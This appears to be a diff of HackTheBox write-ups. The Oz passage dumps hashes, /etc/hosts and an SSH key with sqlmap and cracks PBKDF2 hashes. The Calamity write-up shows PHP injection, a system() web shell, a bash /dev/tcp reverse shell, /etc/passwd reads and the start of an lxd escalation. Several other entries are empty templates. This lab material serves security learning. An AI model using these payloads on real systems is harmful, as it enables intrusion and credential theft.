| 6 | GBR-5012 | I bet you won't read the next entry. |
| 7 | GBR-7890 | HAHA! Made you look. |
| 8 | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db. |
| 9 | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= |
| 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt |
| 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt |
| 12 | GBR-9872 | db information loaded to ticket application for shared db access |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
[14:47:36] [INFO] table 'ozdb.tickets_gbw' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/dump/ozdb/tickets_gbw.csv'
[14:47:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[14:47:36] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:47:36 /2021-01-21/
Now that we have MySQL hashes, ozdb user hashes and a hint about SSH keys, we enumerate further with the --file-read option. Although it is not able to give us the user flag, it does give us the /etc/hosts file:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --file-read=/etc/hosts --batch
[14:53:22] [INFO] the back-end DBMS operating system is Linux
[14:53:22] [INFO] fetching file: '/etc/hosts'
do you want confirmation that the remote file '/etc/hosts' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[14:53:22] [INFO] the local file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts' and the remote file '/etc/hosts' have the same size (175 B)
files saved to [1]:
[*] /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts (same file)
[14:53:22] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:53:22 /2021-01-21/
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.100.10.4 b9b370edd41a
The random hex hostname (b9b370edd41a) and the 10.100.10.4 address are a hint that this is a Docker container. Next we grab the ssh keys:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --file-read=/home/dorthi/.ssh/id_rsa --batch
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6
[...]
-----END RSA PRIVATE KEY-----
This is a passphrase-encrypted private key, so we could try to crack it with john by first turning it into a hash with ssh2john:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ locate ssh2john
/usr/share/john/ssh2john.py
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ python $(locate ssh2john)
Usage: /usr/share/john/ssh2john.py
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ python $(locate ssh2john) id_rsa > hash
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ cat hash
id_rsa:$sshng$1$16$66B9F39F33BA0788CD27207BF8F2D0F6$1200$[...]
However, the intended path is to crack the hashes we got from ozdb, in particular wizard.oz's password hash:
Table: users_gbw
[6 entries]
+----+----------------------------------------------------------------------------------------+-------------+
| id | password | username |
+----+----------------------------------------------------------------------------------------+-------------+
| 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
| 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
| 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
| 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
| 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
| 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+----+----------------------------------------------------------------------------------------+-------------+
These are PBKDF2-HMAC-SHA256 hashes with 5000 rounds in passlib's `$pbkdf2-sha256$rounds$salt$digest` string format, so we crack wizard.oz's hash with john and rockyou.txt and get the password wizardofoz22. Let's log in:
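To make the hash format concrete, here is an added example (my code, not part of the original writeup or of the ozdb application) that parses the `$pbkdf2-sha256$` strings from the dump above, verifies a candidate password against one, and runs a tiny wordlist attack the way john does. It assumes the format is passlib's pbkdf2_sha256 (adapted base64 with `.` in place of `+` and no padding, 32-byte digest); the wordlist and the demo hash built with a zero salt are constructed for the example, while `WIZARD_OZ_HASH` is the real value from the dump.

```python
import base64
import hashlib
import hmac
import os
from typing import Iterable, Optional, Tuple

# passlib's pbkdf2_sha256 string format:  $pbkdf2-sha256$<rounds>$<salt>$<digest>
# salt and digest use "adapted base64": standard alphabet, '+' replaced by '.', no padding.

def ab64_decode(s: str) -> bytes:
    s = s.replace(".", "+")
    return base64.b64decode(s + "=" * (-len(s) % 4))

def ab64_encode(b: bytes) -> str:
    return base64.b64encode(b).decode().rstrip("=").replace("+", ".")

def parse_pbkdf2_sha256(h: str) -> Tuple[int, bytes, bytes]:
    """Split a $pbkdf2-sha256$ hash into (rounds, salt, digest)."""
    parts = h.split("$")
    if len(parts) != 5 or parts[0] != "" or parts[1] != "pbkdf2-sha256":
        raise ValueError("not a pbkdf2-sha256 hash: %r" % h)
    return int(parts[2]), ab64_decode(parts[3]), ab64_decode(parts[4])

def make_hash(password: str, rounds: int = 5000, salt: Optional[bytes] = None) -> str:
    """Produce a hash in the same format (used here only to build test data)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds, dklen=32)
    return "$pbkdf2-sha256$%d$%s$%s" % (rounds, ab64_encode(salt), ab64_encode(dk))

def verify(h: str, candidate: str) -> bool:
    """Recompute PBKDF2 with the stored salt/rounds and compare in constant time."""
    rounds, salt, digest = parse_pbkdf2_sha256(h)
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, rounds, dklen=len(digest))
    return hmac.compare_digest(dk, digest)

def crack(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first word of the wordlist that verifies against h, else None."""
    for word in wordlist:
        word = word.rstrip("\r\n")
        if verify(h, word):
            return word
    return None

# Real hash from the users_gbw dump (wizard.oz); parsing it needs no password.
WIZARD_OZ_HASH = "$pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY"

# Constructed stand-in for rockyou.txt.
SAMPLE_WORDLIST = ["password", "dorothy", "wizardofoz22", "emerald"]

if __name__ == "__main__":
    rounds, salt, digest = parse_pbkdf2_sha256(WIZARD_OZ_HASH)
    print(f"rounds={rounds} salt={len(salt)} bytes digest={len(digest)} bytes")
    demo = make_hash("wizardofoz22", 5000, b"\x00" * 16)  # constructed hash, not the box's
    print("demo hash cracks to:", crack(demo, SAMPLE_WORDLIST))
    # The writeup says the real hash cracks to wizardofoz22 with rockyou.txt:
    print("wizard.oz cracks to:", crack(WIZARD_OZ_HASH, SAMPLE_WORDLIST))
```

With a real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", errors="ignore")` as the iterable; at 5000 rounds this pure-Python loop is far slower than john, which is why the writeup uses john, but the logic is identical.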
![](prg/13/4.png) ![](prg/13/5.png)
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/14.md Normal file
@@ -0,0 +1,66 @@
# Zipper Writeup
![](img/14.png)
## Introduction :
Zipper is a hard linux box released back in October 2018.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/15.md Normal file
@@ -0,0 +1,66 @@
# Conceal Writeup
![](img/15.png)
## Introduction :
Conceal is a hard windows box released back in January 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/16.md Normal file
@@ -0,0 +1,66 @@
# FluJab Writeup
![](img/16.png)
## Introduction :
FluJab is a hard linux box released back in January 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/17.md Normal file
@@ -0,0 +1,66 @@
# Helpline Writeup
![](img/17.png)
## Introduction :
Helpline is a hard windows box released back in March 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/18.md Normal file
@@ -0,0 +1,66 @@
# OneTwoSeven Writeup
![](img/18.png)
## Introduction :
OneTwoSeven is a hard linux box released back in April 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/19.md Normal file
@@ -0,0 +1,66 @@
# Ghoul Writeup
![](img/19.png)
## Introduction :
Ghoul is a hard linux box released back in May 2019.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

Hard/2.md Normal file
@@ -0,0 +1,499 @@
# Calamity Writeup
![](img/2.png)
## Introduction :
Calamity is a hard linux box released back in June 2017.
## **Part 1 : Initial Enumeration**
As always we begin our enumeration using **Nmap** to enumerate open ports. We will be using the flags **-sT** for tcp ports and **-sU** for udp ports.
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ sudo nmap -vvv -sTU -p- 10.10.10.27 --max-retries 0 -Pn --min-rate=500 | grep Discovered
[sudo] password for nothing:
Discovered open port 80/tcp on 10.10.10.27
Discovered open port 22/tcp on 10.10.10.27
Once we know which ports are open, we enumerate the ones we want with **-p**, using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ nmap -sCV -p80,22 10.10.10.27
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-07 15:55 BST
Nmap scan report for 10.10.10.27
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:46:31:9c:b5:71:c5:96:91:7d:e4:63:16:f9:59:a2 (RSA)
| 256 10:c4:09:b9:48:f1:8c:45:26:ca:f6:e1:c2:dc:36:b9 (ECDSA)
|_ 256 a8:bf:dd:c0:71:36:a8:2a:1b:ea:3f:ef:66:99:39:75 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Brotherhood Software
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.00 seconds
## **Part 2 : Getting User Access**
Our nmap scan picked up port 80 so let's investigate it:
![](prg/2/001.png)
[ 10.10.14.9/23 ] [ /dev/pts/9 ] [~/_HTB/Calamity]
→ gobuster dir -u http://10.10.10.27 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.27
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: html,php,asp,aspx,jsp,txt
[+] Timeout: 10s
===============================================================
2020/08/07 16:00:31 Starting gobuster
===============================================================
/index.md (Status: 200)
/uploads (Status: 301)
/admin.php (Status: 200)
Progress: 20842 / 220561 (9.45%)
Running gobuster we see that we have an interesting admin.php webpage:
![](prg/2/002.png)
The page source contains an HTML comment hinting at a password, "skoupidotenekes", so we blindly try the credentials admin:skoupidotenekes:
![](prg/2/003.png)
The idea here is to send GET requests to admin.php and test whether the html parameter is rendered as HTML, and if it is, whether we can also execute PHP code through it (which would hopefully let us spawn a reverse shell).
![](prg/2/004.png)
Once the request is sent to the repeater, we change the html parameter to see if we can get anything:
![](prg/2/005.png)
And it looks like our own HTML is rendered by the page! Now let's see if we can execute PHP code:
<?php echo "nihilist"; ?>
![](prg/2/006.png)
Now let's see if we can print out the phpinfo() function:
http://10.10.10.27/admin.php?html=%3C%3fphp+phpinfo()%3b+%3f%3E
![](prg/2/007.png) ![](prg/2/008.png)
phpinfo() confirms that our PHP runs server-side, but that alone does not give us a shell, so let's try to execute OS commands from our PHP injection:
<?php system($_REQUEST["cmd"]); ?>
Here system() runs whatever arrives in the cmd request parameter, so we add a second parameter setting cmd to "id" to see which user our commands run as:
&cmd=id
which gives us this request:
html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd=id
![](prg/2/009.png)
And we can execute commands as www-data! Now let's get a reverse shell onto the box:
html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261'
Here is our GET request:
GET /admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.9/9001+0>%261' HTTP/1.1
Host: 10.10.10.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.27/admin.php
Connection: close
Cookie: adminpowa=noonecares
Upgrade-Insecure-Requests: 1
![](prg/2/010.png)
And we get a reverse shell! However our reverse shell dies after a few seconds, so for now we keep issuing commands through the PHP injection instead:
/admin.php?html=<%3fphp+system($_REQUEST["cmd"])%3b+%3f>&cmd=cat+/etc/passwd
![](prg/2/011.png)
And /etc/passwd gives us the username xalvas, so let's try to read the user flag at /home/xalvas/user.txt:
![](prg/2/012.png)
And that's it ! we have been able to read the user flag.
## **Part 3 : Getting Root Access**
We can already read the user flag through our PHP injection, but to get root access we need to poke around the box further:
![](prg/2/013.png)
Here we see that there is a file called recov.wav, so we get it onto our box by base64-encoding it on the target and copying the encoded output out of the HTTP response:
![](prg/2/014.png)
Here we can just right click the response, and hit "copy to file"
![](prg/2/015.png)
Edit out the HTML part in nano, then decode the base64 (the plain -d fails with "invalid input" because of the stray characters and CRLF line endings left over from the HTTP response; -i tells base64 to ignore anything outside its alphabet) and use the file utility to print extra info about recov.wav:
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ file recov.wav.b64.req
recov.wav.b64.req: HTML document, ASCII text, with CRLF, LF line terminators
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ nano recov.wav.b64.req
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ mv recov.wav.b64.req recov.wav.b64
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ base64 -d recov.wav.b64 > recov.wavv
base64: invalid input
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ base64 -di recov.wav.b64 > recov.wav
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ file recov.wav
recov.wav: RIFF (little-endian) data, WAVE audio, Microsoft PCM, 16 bit, stereo 44100 Hz
[ 10.10.14.9/23 ] [ /dev/pts/16 ] [~/_HTB/Calamity]
→ audacity recov.wav
![](prg/2/016.png)
The wav file is basically a rickroll track. But if we invert one of the two stereo channels in Audacity and mix them down, everything that is common to both channels cancels out and only the difference between them remains, and in that difference a voice says:
47936..* your password is 185
Put back in order (the recording wraps around), it says:
your password is 18547936..*
so we try to log in via ssh with the credentials xalvas:18547936..*
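The Audacity trick (invert one channel, mix to mono) is just left minus right per sample, and it can be done offline with the standard library. The following is an added example, my code and not from the original writeup: it reads a 16-bit stereo WAV like recov.wav, writes the difference channel as a mono WAV you can listen to, and, since the real file is not reproduced here, builds a constructed stand-in in which a quiet "message" tone sits in the left channel only, on top of a loud carrier present in both, so you can see the carrier cancel.

```python
import array
import io
import math
import sys
import wave

def difference_channel(wav_bytes: bytes):
    """Return (sample_rate, left-minus-right samples) for a 16-bit stereo PCM WAV.

    Audio that is identical in both channels cancels; audio present in only one
    channel survives, which is exactly what exposed the hidden voice in recov.wav.
    """
    with wave.open(io.BytesIO(wav_bytes), "rb") as w:
        if w.getnchannels() != 2 or w.getsampwidth() != 2:
            raise ValueError("expected 16-bit stereo PCM")
        rate = w.getframerate()
        raw = w.readframes(w.getnframes())
    pcm = array.array("h")
    pcm.frombytes(raw)            # interleaved L, R, L, R, ...
    if sys.byteorder == "big":
        pcm.byteswap()            # WAV sample data is little-endian
    left, right = pcm[0::2], pcm[1::2]
    # Clamp so a loud one-sided signal cannot wrap around in int16.
    diff = array.array("h", (max(-32768, min(32767, l - r)) for l, r in zip(left, right)))
    return rate, diff

def write_mono16(path: str, rate: int, samples) -> None:
    """Write samples as a mono 16-bit WAV (for listening to the difference)."""
    out = array.array("h", samples)
    if sys.byteorder == "big":
        out.byteswap()
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(out.tobytes())

def make_test_wav(rate: int = 8000, n: int = 800):
    """Constructed stand-in for recov.wav: a loud 440 Hz tone in both channels
    plus a quiet 1 kHz 'message' in the left channel only. Returns (wav bytes, message)."""
    carrier = [int(10000 * math.sin(2 * math.pi * 440 * i / rate)) for i in range(n)]
    message = [int(3000 * math.sin(2 * math.pi * 1000 * i / rate)) for i in range(n)]
    pcm = array.array("h")
    for c, m in zip(carrier, message):
        pcm.append(c + m)         # left  = carrier + message
        pcm.append(c)             # right = carrier only
    if sys.byteorder == "big":
        pcm.byteswap()
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(2)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(pcm.tobytes())
    return buf.getvalue(), message

if __name__ == "__main__":
    # python3 wavdiff.py recov.wav  -> recov_diff.wav ; with no argument the constructed file is used
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_test_wav()[0]
    rate, diff = difference_channel(data)
    write_mono16("recov_diff.wav", rate, diff)
    print(f"wrote recov_diff.wav: {len(diff)} samples at {rate} Hz")
```

On the real file the difference track is where the "your password is" voice lives; on the constructed one the 440 Hz carrier vanishes and only the 1 kHz tone is left.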
[ 10.10.14.9/23 ] [ /dev/pts/11 ] [~]
→ ssh xalvas@10.10.10.27
The authenticity of host '10.10.10.27 (10.10.10.27)' can't be established.
ECDSA key fingerprint is SHA256:yT6ino7wgCPkMVczALjJ+BeH7VZB+It79p9HRVPEyuY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.27' (ECDSA) to the list of known hosts.
xalvas@10.10.10.27's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic i686)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
9 packages can be updated.
8 updates are security updates.
Last login: Fri Jun 30 08:27:25 2017 from 10.10.13.44
xalvas@calamity:~$ id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
xalvas@calamity:~$
Typing id shows that xalvas is a member of the lxd group, which for privilege escalation purposes is comparable to being in the docker group: a member can create privileged containers and mount the host filesystem into them. So first of all let's build an Alpine Linux LXD image on our machine:
xalvas@calamity:~$ id
uid=1000(xalvas) gid=1000(xalvas) groups=1000(xalvas),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
xalvas@calamity:~$ which lxc
/usr/bin/lxc
xalvas@calamity:~$ lxc --help
Usage: lxc command [options]
This is the LXD command line client.
All of LXD's features can be driven through the various commands below.
For help with any of those, simply call them with --help.
Commands:
config Change container or server configuration options
copy Copy containers within or in between LXD instances
delete Delete containers and snapshots
exec Execute commands in containers
file Manage files in containers
image Manipulate container images
info Show container or server information
launch Create and start containers from images
list List the existing containers
move Move containers within or in between LXD instances
profile Manage container configuration profiles
publish Publish containers as images
remote Manage the list of remote LXD servers
restart Restart containers
restore Restore containers from snapshots
snapshot Create container snapshots
start Start containers
stop Stop containers
version Print the version number of this client tool
Options:
--all Print less common commands
--debug Print debug information
--verbose Print verbose information
--version Show client version
Environment:
LXD_CONF Path to an alternate client configuration directory
LXD_DIR Path to an alternate server directory
The idea here is to import an Alpine Linux image onto calamity with lxc's image import feature, start a privileged container from it with the host's root filesystem mounted inside, and use that to get root access to the host:
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
→ sudo apt update -y
Hit:1 http://packages.microsoft.com/repos/vscode stable InRelease
Hit:2 http://archive-4.kali.org/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree
Reading state information... Done
All packages are up to date.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~]
→ sudo apt install docker.io
Reading package lists... Done
Building dependency tree
Reading state information... Done
docker.io is already the newest version (19.03.12+dfsg1-3).
The following packages were automatically installed and are no longer required:
libmpdec2 libx264-155
Use 'sudo apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ ls
recov.wav recov.wav.b64 recov.wavv
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ mkdir lxd
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity]
→ cd lxd
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
→ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 27, done.
remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27
Unpacking objects: 100% (27/27), 15.98 KiB | 287.00 KiB/s, done.
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd]
→ cd lxd-alpine-builder/
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ ls
build-alpine LICENSE README.md
So here we install docker.io (already present) and clone saghul's lxd-alpine-builder repo, which builds a minimal Alpine rootfs tarball that LXD can import:
[ 10.10.14.8/23 ] [ /dev/pts/24 ] [~/_HTB/Calamity/lxd/lxd-alpine-builder]
→ sudo su
root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ls
build-alpine LICENSE README.md rootfs
root@nowhere:/home/nothing/_HTB/Calamity/lxd/lxd-alpine-builder# ./build-alpine -a i686
Determining the latest release... v3.12
Using static apk from http://dl-cdn.alpinelinux.org/alpine//v3.12/main/x86
Downloading alpine-keys-2.2-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading apk-tools-static-2.10.5-r1.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
Downloading alpine-mirrors-3.5.10-r0.apk
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
tar: Ignoring unknown extended header keyword 'APK-TOOLS.checksum.SHA1'
alpine-devel@lists.alpinelinux.org-4a6a0840.rsa.pub: OK
Verified OK
Selecting mirror http://nl.alpinelinux.org/alpine/v3.12/main
fetch http://nl.alpinelinux.org/alpine/v3.12/main/x86/APKINDEX.tar.gz
(1/19) Installing musl (1.1.24-r9)
(2/19) Installing busybox (1.31.1-r19)
